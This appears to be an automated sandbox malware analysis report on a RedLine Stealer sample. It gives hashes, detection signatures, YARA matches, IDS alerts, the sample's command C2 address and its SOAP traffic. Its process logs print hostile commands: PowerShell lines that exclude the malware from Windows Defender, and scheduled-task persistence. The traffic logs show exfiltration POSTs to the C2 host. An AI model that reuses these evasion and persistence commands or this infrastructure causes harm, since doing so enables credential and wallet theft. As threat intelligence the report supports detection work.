Windows Analysis Report
I5pvP0CU6M.exe

Overview

General Information

Sample name: I5pvP0CU6M.exe
renamed because original name is a hash value
Original sample name: 68b2a6e71c0c904a9aeabfc9adbf7a21.exe
Analysis ID: 1548177
MD5: 68b2a6e71c0c904a9aeabfc9adbf7a21
SHA1: 0577bcb0a9736b45f1eb92f6070aac2134e674dc
SHA256: f6b09208c3523be3a490af2fc305d4574b38d95a435c8a55402fca38597e6dac
Tags: exe, RedLineStealer, user-abuse_ch

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • I5pvP0CU6M.exe (PID: 2432 cmdline: "C:\Users\user\Desktop\I5pvP0CU6M.exe" MD5: 68B2A6E71C0C904A9AEABFC9ADBF7A21)
    • powershell.exe (PID: 4788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VcihjWRO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7240 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5720 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • I5pvP0CU6M.exe (PID: 6724 cmdline: "C:\Users\user\Desktop\I5pvP0CU6M.exe" MD5: 68B2A6E71C0C904A9AEABFC9ADBF7A21)
      • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • VcihjWRO.exe (PID: 7224 cmdline: C:\Users\user\AppData\Roaming\VcihjWRO.exe MD5: 68B2A6E71C0C904A9AEABFC9ADBF7A21)
    • schtasks.exe (PID: 7472 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • VcihjWRO.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Roaming\VcihjWRO.exe" MD5: 68B2A6E71C0C904A9AEABFC9ADBF7A21)
    • VcihjWRO.exe (PID: 7568 cmdline: "C:\Users\user\AppData\Roaming\VcihjWRO.exe" MD5: 68B2A6E71C0C904A9AEABFC9ADBF7A21)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["45.137.22.248:55615"], "Bot Id": "cheat"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x133ca:$a4: get_ScannedWallets
  • 0x12228:$a5: get_ScanTelegram
  • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
  • 0x10e6a:$a7: <Processes>k__BackingField
  • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x1079e:$a9: <ScanFTP>k__BackingField
0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
11.2.VcihjWRO.exe.4445bf8.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
11.2.VcihjWRO.exe.4445bf8.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
11.2.VcihjWRO.exe.4445bf8.1.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x117ca:$a4: get_ScannedWallets
  • 0x10628:$a5: get_ScanTelegram
  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
  • 0xf26a:$a7: <Processes>k__BackingField
  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0xeb9e:$a9: <ScanFTP>k__BackingField
11.2.VcihjWRO.exe.4445bf8.1.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0xe68a:$u7: RunPE
  • 0x11d41:$u8: DownloadAndEx
  • 0x7330:$pat14: , CommandLine:
  • 0x11279:$v2_1: ListOfProcesses
  • 0xe88b:$v2_2: get_ScanVPN
  • 0xe92e:$v2_2: get_ScanFTP
  • 0xf61e:$v2_2: get_ScanDiscord
  • 0x1060c:$v2_2: get_ScanSteam
  • 0x10628:$v2_2: get_ScanTelegram
  • 0x106ce:$v2_2: get_ScanScreen
  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
  • 0x11709:$v2_2: get_ScanBrowsers
  • 0x117ca:$v2_2: get_ScannedWallets
  • 0x117f0:$v2_2: get_ScanWallets
  • 0x11810:$v2_3: GetArguments
  • 0xfed9:$v2_4: VerifyUpdate
  • 0x147ea:$v2_4: VerifyUpdate
  • 0x11bca:$v2_5: VerifyScanRequest
  • 0x112c6:$v2_6: GetUpdates
  • 0x147cb:$v2_6: GetUpdates
11.2.VcihjWRO.exe.445da18.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\I5pvP0CU6M.exe", ParentImage: C:\Users\user\Desktop\I5pvP0CU6M.exe, ParentProcessId: 2432, ParentProcessName: I5pvP0CU6M.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", ProcessId: 4788, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\VcihjWRO.exe, ParentImage: C:\Users\user\AppData\Roaming\VcihjWRO.exe, ParentProcessId: 7224, ParentProcessName: VcihjWRO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp", ProcessId: 7472, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\I5pvP0CU6M.exe", ParentImage: C:\Users\user\Desktop\I5pvP0CU6M.exe, ParentProcessId: 2432, ParentProcessName: I5pvP0CU6M.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp", ProcessId: 5720, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\I5pvP0CU6M.exe", ParentImage: C:\Users\user\Desktop\I5pvP0CU6M.exe, ParentProcessId: 2432, ParentProcessName: I5pvP0CU6M.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe", ProcessId: 4788, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\I5pvP0CU6M.exe", ParentImage: C:\Users\user\Desktop\I5pvP0CU6M.exe, ParentProcessId: 2432, ParentProcessName: I5pvP0CU6M.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp", ProcessId: 5720, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-04T04:32:12.999384+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.6 | 49763 | TCP
2024-11-04T04:32:50.939185+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.6 | 49984 | TCP
2024-11-04T04:32:09.774888+0100 | 2045000 | 1 | Malware Command and Control Activity Detected | 45.137.22.248 | 55615 | 192.168.2.6 | 49718 | TCP
2024-11-04T04:32:20.283399+0100 | 2045000 | 1 | Malware Command and Control Activity Detected | 45.137.22.248 | 55615 | 192.168.2.6 | 49784 | TCP
2024-11-04T04:32:13.527487+0100 | 2045001 | 1 | Malware Command and Control Activity Detected | 45.137.22.248 | 55615 | 192.168.2.6 | 49718 | TCP
2024-11-04T04:32:23.737177+0100 | 2045001 | 1 | Malware Command and Control Activity Detected | 45.137.22.248 | 55615 | 192.168.2.6 | 49784 | TCP
2024-11-04T04:32:04.724301+0100 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 45.137.22.248 | 55615 | TCP
2024-11-04T04:32:15.174201+0100 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49784 | 45.137.22.248 | 55615 | TCP
2024-11-04T04:32:10.039181+0100 | 2849351 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 45.137.22.248 | 55615 | TCP
2024-11-04T04:32:20.816931+0100 | 2849351 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49784 | 45.137.22.248 | 55615 | TCP
2024-11-04T04:32:13.584322+0100 | 2849352 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49777 | 45.137.22.248 | 55615 | TCP
2024-11-04T04:32:24.140389+0100 | 2849352 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49837 | 45.137.22.248 | 55615 | TCP

AV Detection

Source: I5pvP0CU6M.exe | Avira: detected
Source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["45.137.22.248:55615"], "Bot Id": "cheat"}
Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe | ReversingLabs: Detection: 68%
Source: I5pvP0CU6M.exe | ReversingLabs: Detection: 68%
Source: I5pvP0CU6M.exe | Virustotal: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: I5pvP0CU6M.exe | Joe Sandbox ML: detected
Source: I5pvP0CU6M.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: I5pvP0CU6M.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe | Code function: 4x nop then jmp 070277EFh | 11_2_07026E1F

Networking

Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.6:49718 -> 45.137.22.248:55615
Source: Network traffic | Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.137.22.248:55615 -> 192.168.2.6:49718
Source: Network traffic | Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.6:49718 -> 45.137.22.248:55615
Source: Network traffic | Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.137.22.248:55615 -> 192.168.2.6:49718
Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.6:49784 -> 45.137.22.248:55615
Source: Network traffic | Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.6:49777 -> 45.137.22.248:55615
Source: Network traffic | Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.137.22.248:55615 -> 192.168.2.6:49784
Source: Network traffic | Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.6:49784 -> 45.137.22.248:55615
Source: Network traffic | Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.137.22.248:55615 -> 192.168.2.6:49784
Source: Network traffic | Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.6:49837 -> 45.137.22.248:55615
Source: Malware configuration extractor | URLs: 45.137.22.248:55615
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 55615
Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 55615
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 55615
Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49777
Source: unknown | Network traffic detected: HTTP traffic on port 49837 -> 55615
Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49837
Source: global traffic | TCP traffic: 192.168.2.6:49718 -> 45.137.22.248:55615
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: 45.137.22.248:55615 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" | Host: 45.137.22.248:55615 | Content-Length: 144 | Expect: 100-continue | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" | Host: 45.137.22.248:55615 | Content-Length: 960380 | Expect: 100-continue | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" | Host: 45.137.22.248:55615 | Content-Length: 960372 | Expect: 100-continue | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" | Host: 45.137.22.248:55615 | Content-Length: 959930 | Expect: 100-continue | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" | Host: 45.137.22.248:55615 | Content-Length: 959922 | Expect: 100-continue | Accept-Encoding: gzip, deflate
Source: Joe Sandbox View | ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49984
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49763
Source: unknown | TCP traffic detected without corresponding DNS query: 45.137.22.248
Source: global traffic | DNS traffic detected: DNS query: api.ip.sb
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: 45.137.22.248:55615 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.137.22.248:55615
Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.137.22.248:55615/
Source: I5pvP0CU6M.exe, VcihjWRO.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: I5pvP0CU6M.exe, VcihjWRO.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: I5pvP0CU6M.exe, VcihjWRO.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: VcihjWRO.exe, 00000011.00000002.2427530855.0000000003350000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2219893866.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 0000000B.00000002.2314956361.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: VcihjWRO.exe, 00000011.00000002.2427530855.0000000003350000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: VcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: VcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: I5pvP0CU6M.exe, VcihjWRO.exe.0.drString found in binary or memory: http://tempuri.org/Gamee.xsd7PoisonRoulette.GameResource
